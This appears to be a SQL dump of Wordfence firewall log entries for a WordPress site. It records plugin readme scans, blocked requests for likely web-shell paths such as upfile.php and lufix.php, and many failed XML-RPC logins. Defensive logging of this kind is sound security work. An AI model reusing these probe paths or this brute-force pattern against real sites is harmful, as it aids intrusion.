(50945, 1712188481.320977, 1712188480.844800, '\0\0\0\0\0\0\0\0\0\0ÿÿmø¯w', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/layouts-for-elementor/readme.txt', NULL, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9sYXlvdXRzLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9sYXlvdXRzLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50955, 1712207731.421957, 1712207730.988600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/lufix.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x1Zml4LnBocA==","category":"brute-force","ssl":1}'),
(50954, 1712207743.089248, 1712207742.677800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/doc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2RvYy5waHA=","category":"brute-force","ssl":1}'),
(50953, 1712207760.182315, 1712207759.767300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/bak.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jhay5waHA=","category":"brute-force","ssl":1}'),
(50933, 1712162915.157518, 1712162914.806200, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œEv', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(50951, 1712207793.229447, 1712207792.804100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/upfile.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZmlsZS5waHA=","category":"brute-force","ssl":1}'),
(50952, 1712207775.401364, 1712207775.062500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/content.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbnRlbnQucGhw","category":"brute-force","ssl":1}'),
(50934, 1712173558.445483, 1712173557.956900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(50935, 1712173539.488704, 1712173539.041600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿº', 0, 403, 0, 0, 0, 'https://happythinking.com/cgi-bin/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NnaS1iaW4vYWJvdXQucGhw","category":"brute-force","ssl":1}'),
(52041, 1712762092.341486, 1712762091.905800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(52022, 1712689695.530741, 1712689695.170200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/themes.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RoZW1lcy5waHA=","category":"brute-force","ssl":1}'),
(51505, 0.000000, 1712320885.735356, '\0\0\0\0\0\0\0\0\0\0ÿÿi®&ê', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51504, 0.000000, 1712320871.066622, '\0\0\0\0\0\0\0\0\0\0ÿÿyzu(', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51502, 0.000000, 1712320868.919587, '\0\0\0\0\0\0\0\0\0\0ÿÿ¶GHå', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51503, 0.000000, 1712320871.820114, '\0\0\0\0\0\0\0\0\0\0ÿÿŠT$7', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51501, 0.000000, 1712320867.643109, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾gÍ²', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51500, 0.000000, 1712320864.094603, '\0\0\0\0\0\0\0\0\0\0ÿÿ%=u’', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51499, 0.000000, 1712320851.320434, '\0\0\0\0\0\0\0\0\0\0ÿÿo}ÝÎ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51497, 0.000000, 1712320833.577500, '\0\0\0\0\0\0\0\0\0\0ÿÿel\Z¡', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51498, 0.000000, 1712320850.158865, '\0\0\0\0\0\0\0\0\0\0ÿÿg¹lp', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51496, 0.000000, 1712320832.975099, '\0\0\0\0\0\0\0\0\0\0ÿÿ`×z', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51495, 0.000000, 1712320827.061994, '\0\0\0\0\0\0\0\0\0\0ÿÿ·S¤', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51494, 0.000000, 1712320824.641161, '\0\0\0\0\0\0\0\0\0\0ÿÿz¨Q', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51493, 0.000000, 1712320825.326500, '\0\0\0\0\0\0\0\0\0\0ÿÿu÷`I', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51492, 0.000000, 1712320822.142272, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼yb', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51490, 0.000000, 1712320810.745610, '\0\0\0\0\0\0\0\0\0\0ÿÿg''÷ž', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51491, 0.000000, 1712320819.327769, '\0\0\0\0\0\0\0\0\0\0ÿÿ])"', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51489, 0.000000, 1712320806.570180, '\0\0\0\0\0\0\0\0\0\0ÿÿ1/GÖ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51488, 0.000000, 1712320805.999943, '\0\0\0\0\0\0\0\0\0\0ÿÿz59', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51485, 0.000000, 1712320785.544769, '\0\0\0\0\0\0\0\0\0\0ÿÿgÙó…', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51486, 0.000000, 1712320785.953349, '\0\0\0\0\0\0\0\0\0\0ÿÿjÙlÇ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51487, 0.000000, 1712320797.250908, '\0\0\0\0\0\0\0\0\0\0ÿÿMSÈ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51481, 0.000000, 1712320773.731569, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾HNh', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51482, 0.000000, 1712320775.549981, '\0\0\0\0\0\0\0\0\0\0ÿÿ¥pá', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51483, 0.000000, 1712320776.528465, '\0\0\0\0\0\0\0\0\0\0ÿÿ%ƒ+I', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51484, 0.000000, 1712320783.268751, '\0\0\0\0\0\0\0\0\0\0ÿÿº„Äd', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51477, 0.000000, 1712320758.419747, '\0\0\0\0\0\0\0\0\0\0ÿÿ|{"', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51478, 0.000000, 1712320763.313273, '\0\0\0\0\0\0\0\0\0\0ÿÿo}ç›', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51479, 0.000000, 1712320764.448827, '\0\0\0\0\0\0\0\0\0\0ÿÿ-©Ì®', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51480, 0.000000, 1712320766.765569, '\0\0\0\0\0\0\0\0\0\0ÿÿ)–Ûý', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51474, 0.000000, 1712320750.255478, '\0\0\0\0\0\0\0\0\0\0ÿÿjØu¸', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51475, 0.000000, 1712320750.664359, '\0\0\0\0\0\0\0\0\0\0ÿÿ>JÔ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51476, 0.000000, 1712320753.523193, '\0\0\0\0\0\0\0\0\0\0ÿÿß€z', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51473, 0.000000, 1712320749.078451, '\0\0\0\0\0\0\0\0\0\0ÿÿ)øeÃ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51472, 0.000000, 1712320744.631115, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\ù†o', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51470, 0.000000, 1712320727.438571, '\0\0\0\0\0\0\0\0\0\0ÿÿÅùÀÁ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51471, 0.000000, 1712320743.337370, '\0\0\0\0\0\0\0\0\0\0ÿÿ''+ÝX', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51469, 0.000000, 1712320725.248031, '\0\0\0\0\0\0\0\0\0\0ÿÿš~º', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51468, 0.000000, 1712320720.303711, '\0\0\0\0\0\0\0\0\0\0ÿÿ''1‘\0', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51467, 0.000000, 1712320718.542575, '\0\0\0\0\0\0\0\0\0\0ÿÿµ.9m', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51466, 0.000000, 1712320718.225219, '\0\0\0\0\0\0\0\0\0\0ÿÿÅùu…', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51464, 0.000000, 1712320710.854370, '\0\0\0\0\0\0\0\0\0\0ÿÿS÷æ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51465, 0.000000, 1712320712.333456, '\0\0\0\0\0\0\0\0\0\0ÿÿgFÊÝ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51463, 0.000000, 1712320710.121579, '\0\0\0\0\0\0\0\0\0\0ÿÿ-uÕM', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51462, 0.000000, 1712320708.224431, '\0\0\0\0\0\0\0\0\0\0ÿÿ.1n', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51460, 0.000000, 1712320693.529434, '\0\0\0\0\0\0\0\0\0\0ÿÿµ.ç', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51461, 0.000000, 1712320694.223362, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$ÒA', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51509, 0.000000, 1712320908.344949, '\0\0\0\0\0\0\0\0\0\0ÿÿ2bGé', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51510, 0.000000, 1712320912.069152, '\0\0\0\0\0\0\0\0\0\0ÿÿ1/Ú›', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51686, 1712367994.147399, 1712367993.541400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-bliss-gallery/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; ONEPLUS A6003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 EdgA/120.0.2210.141', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1ibGlzcy1nYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1ibGlzcy1nYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51684, 1712367996.168619, 1712367995.831400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-vertical-gallery/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC12ZXJ0aWNhbC1nYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC12ZXJ0aWNhbC1nYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51685, 1712367994.147775, 1712367993.541400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-bliss-gallery/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; ONEPLUS A6003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 EdgA/120.0.2210.141', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1ibGlzcy1nYWxsZXJ5L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1ibGlzcy1nYWxsZXJ5L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51062, 0.000000, 1712318730.064099, '\0\0\0\0\0\0\0\0\0\0ÿÿgD~', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
